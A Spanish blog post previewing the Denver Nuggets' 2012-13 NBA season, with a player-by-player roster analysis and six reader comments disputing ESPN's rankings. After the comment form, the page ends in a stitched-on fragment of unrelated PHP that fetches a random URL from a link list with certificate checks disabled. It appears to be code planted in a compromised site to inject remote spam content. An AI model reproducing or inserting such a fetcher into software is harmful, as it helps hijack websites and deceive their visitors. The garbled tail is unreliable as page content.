Denver Nuggets: Mucho y bueno

21 de October de 2012 por Simon
Si el análisis del año pasado comenzaba alabando el aprovechamiento del “MeloDrama” para reconstruir en un visto y no visto, este año tenemos que destacar la ganancia en el otro gran culebrón protagonizado por una estrella NBA, Dwight Howard. “The Dwightmare” acabó con los huesos de Howard en Los Angeles, pero lo que nadie podría esperar es que en todo ese río revuelto los Nuggets podrían pescar.  Mandaron a Afflalo y Harrington a Orlando y de Philadelphia llegó el All-Star y campeón olímpico Andre Iguodala. Durante la temporada se habían desecho de Nené, un jugador “cuestionado” por su historial de lesiones, y había llegado como recambio Javale McGee, más joven, mas alto y más fuerte, que no más inteligente. Los Nuggets han apostado fuerte por él y le han firmado un contrato ligeramente inferior al que tenía Nené.

La plantilla de Denver es sin lugar a dudas la más profunda de la liga. Mientras el resto de franquicias buscan desesperadamente una superestrella sobre la que reconstruir, la filosofía de Denver, tras la marcha de Anthony, es reunir un grupo sin una superestrella pero muy compensado, repleto de buenos jugadores en todas y cada una de las líneas. Aquí el “jugador franquicia” es George Karl que hace, deshace y exprime su plantilla a las mil maravillas. Entretienen, anotan y encima ganan, un lujo para el espectador de la NBA.

El base titular continuará siendo el pequeño Ty Lawson, que viene de una temporada en la que ha anotado, asistido y reboteado razonablemente bien. Es, probablemente, uno de los jugadores más rápidos de la liga e ideal para el estilo de juego que proponen los de Colorado. Su recambio será el veterano André Miller, con total seguridad el mejor base suplente de la competición. Hace siempre lo correcto: es capaz de asistir, de jugar en estático y es también un crack dirigiendo el contraataque. Ojito con el repertorio de Alley-Oop  que puede dejarnos en compañía de JaVale McGee. En definitiva, posición muy bien cubierta con dos buenos bases pero con un defecto muy marcado: ninguno anota desde más allá de la línea de 3 puntos con regularidad. El veteranísimo Anthony Carter cubrirá los minutos de la basura.

En las alas partirán de titulares Iguodala y Gallinari dos jugadores que pueden compenetrarse de manera fantástica. Iguodala es uno de los mejores defensor perimetrales de la liga y puede defender tanto a escoltas como aleros, lo que descarga de responsabilidad en ese apartado al italiano. El juego de Denver viene como anillo al dedo a ex de los Sixers que es imparable en el contraataque gracias a su gran capacidad atlética, velocidad y capacidad de robar el balón.  Si Karl puede quitarle de la mente el rol de estrella que él piensa que puede ser y lo adapta a lo que necesita Denver (un Iguodala más parecido al del último año) será una incorporación perfecta.  Hasta ahora hemos visto un gran defecto en el tiro exterior de Denver. Pues aquí entra Danilo Gallinari, un excelente tirador, jugador ofensivo en general al que la agresividad de Iguodala puede venirle de perlas para tener más espacio y distracción por parte de la defensa rival para dedicarse a definir. Debido a su altura puede ver minutos en la posición de ala-pívot. Esperen una gran temporada de Danilo, que tiene alma de líder y puede ser ese jugador que le falta a Denver. Sus suplentes serán Corey Brewer y Wilson Chandler dos buenos jugadores que se desenvuelven a la perfección en el contraataque, que son buenísimos defensores , pero con el mismo lunar que la mayoría de sus compañeros, el tiro de 3 puntos. Si estos 4 jugadores se complementan bien y defienden al nivel que se les presupone, Denver puede ganar a cualquiera.

También tendrá minutos el prometedor jugador francés Evan Fournier con unas cualidades para anotar innatas, que puede mejorar y perfilar al lado de George Karl y cocinarse a fuego lento desde el banco viendo minutos aquí y allá. Gran proyecto el que tiene Denver en este jugador.  Completan el juego de perímetro Jordan Hamilton, que puede anotar desde lejos,  y Quincy Miller, un jugador del que se hablaba mucho en el instituto pero que ha visto destrozada completamente su carrera por culpa de una grave lesión en la universidad. Jugará mas minutos en la liga de desarrollo que en la NBA esta temporada.

Metidos en la pintura nos encontramos a Kenneth “The Manimal” Faried. A pesar de no tener un buen tamaño es capaz de suplir estas debilidades con una gran energía. Uno de los mejores interiores de la liga al contragolpe aunque sin un gran repertorio ofensivo. Se dedica a recibir y definir y es un gran reboteador sobre todo ofensivo. En definitiva un “hustler”, con pocas virtudes pero aprovechadas al 120% y grandes defectos que compensa con una energía impresionante.  Su recambio será Anthony Randolph, otro gran jugador al contraataque, que a diferencia de Faried si es capaz de crear su propio tiro aunque de forma bastante irregular. Un jugador en constante desarrollo que no termina de explotar pero que tiene todo para hacerlo. Su falta de kilos en defensa le lastra bastante a la hora de pegarse abajo con otros internos más fuertes que él.

El center titular será Timofey Mozgov. El ruso es el mejor defensor de los 3 centers en nómina, todo una roca debajo del aro debido a su imponente físico. Pero si en defensa es una roca en el sentido positivo también es una roca en ataque donde apenas aporta nada. Su juego se basa en recibir y hacer un mate, no es capaz de aportar otra cosa. Tampoco es un gran reboteador. Aunque salga desde el banco el pívot “principal” será McGee, probablemente el cinco mas ágil de toda la liga. Tampoco es capaz de buscar ( con efectividad ) sus propios tiros pero como definidor es muy bueno. Uno de los jugadores más espectaculares de la liga al verlo matar. Su defensa del poste es bastante mala, aunque es capaz de cambiar y taponar una gran cantidad de tiros. Su agilidad le ayuda a defender muy bien el Pick And Roll. Debe dar un paso adelante en su ataque y mejorar en el poste en defensa para valer el contrato que ha firmado. El tercer pívot será Kosta Koufos, es un (buen) jugador en el poste bajo tanto en ataque como en defensa, aunque tampoco nadie que marque diferencias.  En cuanto tiene minutos se mete en problemas de faltas así que es imposible que vea muchos minutos ni en Denver ni en ningún otro equipo.

Denver es un equipo sumamente interesante y capaz de competir con cualquier equipo de la liga. La no presencia de un líder claro, más que de una estrella, es lo que le falta para dar el salto de aspirante a contendiente por el título. Un tirador no les vendría nada mal pues solo Gallinari es fiable desde lejos. Su vocación ofensiva tapa la teórica capacidad defensiva que podrían presentar y es que si todos los jugadores de Denver se pusieran a defender, con la gran cantidad de recursos y variables que tienen podrían ser mucho más peligrosos. Es un equipo hecho por y para correr.

Lo mejor: La cantidad de recursos y de jugadores válidos para mantener un ritmo asfixiante.
Lo peor:  La falta de un líder. La falta de tiradores externos fiables.

Quinteto: Lawson, Iguodala, Gallinari, Faried, Mozgov

Pronóstico: Por encima de 50 victorias. Semifinales de conferencia.

Comenta

6 comentarios a esta entrada

  1. Uno cualquiera dice:
    #1

    Según las predicciones de este año de la ESPN, quedarán primeros de conferencia.

    http://espn.go.com/nba/story/_/id/8517499/miami-heat-denver-nuggets-top-magazine-team-predictions-espn-magazine

    Particularmente, no creo que eso suceda. Tienen el mismo problema que el año pasado: mucho buen jugador pero ningún jugador franquicia.

      Citar

  2. nba dice:
    #2

    Lo de la ESPN tiene delito, que manera de despreciar a OKC ,Aunque muchos los colocan muy arriba en la conferencia Oeste, yo creo que va a ser el equipo que nos va a decepcionar, ya que se espera mucho de ellos, y teniendo en cuenta como esta el Oeste, les veo faltos de mentalidad para ganar en los momentos importantes, aunque cuenten con un crack como Iguodala.

      Citar

  3. Sancho88 dice:
    #3

    Lo mismo del año con más calidad. Top 5 del Oeste, pero a ver si logran pasar de primera ronda… contra equipos como Grizzlies, Jazz, etc

      Citar

  4. lost dice:
    #4

    Atlanta segundo de conferencia para la ESPN…

      Citar

  5. Sancho88 dice:
    #5

    La ESPN se meten absolutamente de todo esos locos!!!!!!!!!!!!!!!!!!!!

      Citar

  6. GreenPride dice:
    #6

    Lo primero lo de la ESPN parece que lo ha hecho un mono tirando una piedra a un charco… ¿Los Hawks segundos del Este? Vamos ya con eso quedan totalmente descalificadas sus clasificaciones.
    Centrandonos en los Nuggets son un equipo con muchos jugadores interesantes pero creo que les falta algo para llegar a pasar una ronda de PO en el salvaje Oeste aunque al que les toque en suerte que se prepare a sufrir una eliminatoria peliaguda.
    En el base dos grandes jugadores muy complementarios como Ty Lawson y Andre Miller. Dolores de cabeza para el adversario.
    En el escolta-alero muchos jugadores de calidad y capaces de anotar. Iguodala dará ese plus de agresividad y defensa que antes intentaba dar Afflalo (clara mejora) y Gallinari y Chandler son anotadores fiables.
    Su punto flaco, los tiradores no son muy fiables desde el triple.
    En la pintura jugadores super-físicos como Faried o McGee que corren el contraataque como centellas y juegan con gran intensidad acompañados por Mozgov que pone sus centímetros y kilos.
    Yo les espero 5º del Oeste justo detrás de Spurs y Clippers y dándlo muchos problemas a cualquiera de estos dos que quede en 4ª posición en unas series vibrantes de PO.
    Un equipo muy entretenido de ver y ultra-rápido pero al que le falta un paso para ser un verdadero aspirante

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>